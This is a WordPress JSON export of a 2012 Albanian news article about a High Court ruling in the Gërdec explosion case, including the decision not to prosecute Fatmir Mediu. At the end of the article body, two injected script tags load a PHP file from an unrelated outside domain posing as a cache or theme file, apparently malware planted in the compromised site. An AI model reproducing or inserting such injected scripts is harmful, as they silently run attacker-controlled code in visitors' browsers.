{"id":482,"date":"2012-09-30T11:38:53","date_gmt":"2012-09-30T09:38:53","guid":{"rendered":"http:\/\/www.respublica.org.al\/?p=482"},"modified":"2013-09-30T11:41:13","modified_gmt":"2013-09-30T09:41:13","slug":"gjykata-e-larte-permendet-nga-letargjia-dhe-e-ben-ne-vjeshte","status":"publish","type":"post","link":"https:\/\/www.respublica.org.al\/web\/?p=482","title":{"rendered":"Gjykata e lart\u00eb p\u00ebrmendet nga letargjia dhe e b\u00ebn n\u00eb vjesht\u00eb"},"content":{"rendered":"<p>Gjykata e lart\u00eb me trup gjykues t\u00eb p\u00ebrb\u00ebr\u00eb nga Fatos Lulo, Gani Dizdari, Arjana Fullani, Majlinda Andrea dhe Mirela Fana ka nxjerr me s\u00eb fundi vendimin p\u00ebr k\u00ebrkesat e disa nga t\u00eb plagosurit r\u00ebnd\u00eb nga shp\u00ebrthimi n\u00eb zon\u00ebn e G\u00ebrdecit. Seanca e zhvilluar ne dat\u00eb 24 janar 2012 ka marr\u00eb k\u00ebto dit\u00eb p\u00ebrgjigjie n\u00eb form\u00ebn e nj\u00eb vendimi t\u00eb zbardhur p\u00ebr publikun. Gjykata e Lart\u00eb mori vendim p\u00ebr mosfillimin e procedimit penal ndaj shtetasit Fatmir Mediu, p\u00ebr vepr\u00ebn penale t\u00eb \u201cplagosjes s\u00eb r\u00ebnd\u00eb nga pakujdesia\u201d, t\u00eb parashikuar nga neni 91 i Kodit Penal; dhe shpalljen e moskompetenc\u00ebs l\u00ebndore p\u00ebr gjykimin e \u00e7\u00ebshtjes ndaj t\u00eb akuzuarve\/t\u00eb paditurve: Ylli Pinari, Sokol Ngjeci, Mihal Delijorgji, Dritan Minxholli, Ministri i Mbrojtjes, K\u00ebshilli i Ministrave dhe d\u00ebrgimin e \u00e7\u00ebshtjes p\u00ebr kompetenc\u00eb Gjykat\u00ebs s\u00eb Shkall\u00ebs s\u00eb Par\u00eb Tiran\u00eb.<\/p>\n<p>Pjesa e par\u00eb e vendimit t\u00eb gjykat\u00ebs s\u00eb lart\u00eb shkon n\u00eb kund\u00ebrshtim t\u00eb hapur vendimin 27. Dt 09.05.2012 t\u00eb Gjykat\u00ebs Kushtetuese ku p\u00ebr nj\u00eb rast identik nga shp\u00ebrthimi i G\u00ebrdecit, ajo shprehet se: \u201c<i>P\u00ebrfundimisht, Gjykata vler\u00ebson se vendimi p\u00ebr mosfillimin e procedimit penal \u00ebsht\u00eb kompetenc\u00eb ekskluzive e organit t\u00eb prokuroris\u00eb<\/i>\u201d \u00a0dhe se \u201c<i>Duke marr\u00eb nj\u00eb vendim t\u00eb till\u00eb, p\u00ebr mosfillimin e procedimit penal, Gjykata e Lart\u00eb i ka atribuar vetes nj\u00eb kompetenc\u00eb, e cila jo vet\u00ebm q\u00eb nuk i njihet nga ligji, por q\u00eb nj\u00ebkoh\u00ebsisht i ka cenuar edhe pozicionin e saj si organ q\u00eb realizon me paanshm\u00ebri dh\u00ebnien e drejt\u00ebsis\u00eb<\/i>\u201d.<\/p>\n<p>Pjesa e dyt\u00eb e vendimit megjith\u00ebse erdhi si veprim i vonuar i Gjykat\u00ebs s\u00eb Lart\u00eb ka sjell\u00eb si zhvillim, mund\u00ebsimin e kalimit t\u00eb dosjes p\u00ebr t\u00eb paditurit e tjer\u00eb n\u00eb seksionin penal, ku dhe \u00ebsht\u00eb p\u00ebrcaktuar data 31 tetor 2012, ora 10 e 30, me gjyqtar Sokol Tona.<script type=\"text\/javascript\" src=\"#\"><\/script><script type=\"text\/javascript\" src=\"http:\/\/www.get.space\/wp-content\/cache\/tmpWpfc\/theme-index.php\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Gjykata e lart\u00eb me trup gjykues t\u00eb p\u00ebrb\u00ebr\u00eb nga Fatos Lulo, Gani Dizdari, Arjana Fullani, Majlinda Andrea dhe Mirela Fana [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":483,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"site-sidebar-layout":"default","site-content-layout":"","ast-site-content-layout":"","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"default","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"var(--ast-global-color-4)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""}},"footnotes":""},"categories":[6,5],"tags":[],"_links":{"self":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts\/482"}],"collection":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=482"}],"version-history":[{"count":1,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts\/482\/revisions"}],"predecessor-version":[{"id":484,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts\/482\/revisions\/484"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/media\/483"}],"wp:attachment":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=482"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=482"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=482"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}